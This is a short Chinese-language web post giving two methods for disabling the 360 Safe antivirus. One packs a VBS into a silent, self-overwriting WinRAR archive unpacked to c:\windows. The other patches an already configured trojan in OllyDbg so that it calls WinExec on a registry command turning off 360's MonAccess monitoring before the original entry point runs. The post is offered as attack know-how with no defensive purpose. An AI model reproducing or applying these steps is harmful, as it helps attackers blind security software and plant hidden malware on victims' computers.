兩種方法：

    （一） BAT＋VBS+RAR

    BAT代碼如下：

    （代碼一貼上來，居然被網(wǎng)站監(jiān)控為不安全信息，不讓發(fā)布，暈4）

    然后用WINRAR建立自解壓文件

    路徑：c:\windows

    解壓后運行：vbs文件名.vbs

    安靜模式：全部隱藏

    覆蓋方式：覆蓋所有文件

    做完即可，

干掉360的兩種方法

電腦資料

    （二） ASM匯編

    這個是最舒服的，用OD打開已經(jīng)配置好的馬，找0區(qū)（也可以用TOPO加空段）要很大一片哦！右擊，選擇“二進制”→“編輯”，在ASCII中輸入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”記下寫入命令的改動的第一個地址，假設(shè)為401180。

    再找一個小空段，記下地址，假設(shè)為40116A

    寫入：

    Push 401180 (也就是那個改動的地址)

    Call WinExec

    Jmp 原程序入口點(在OD右邊)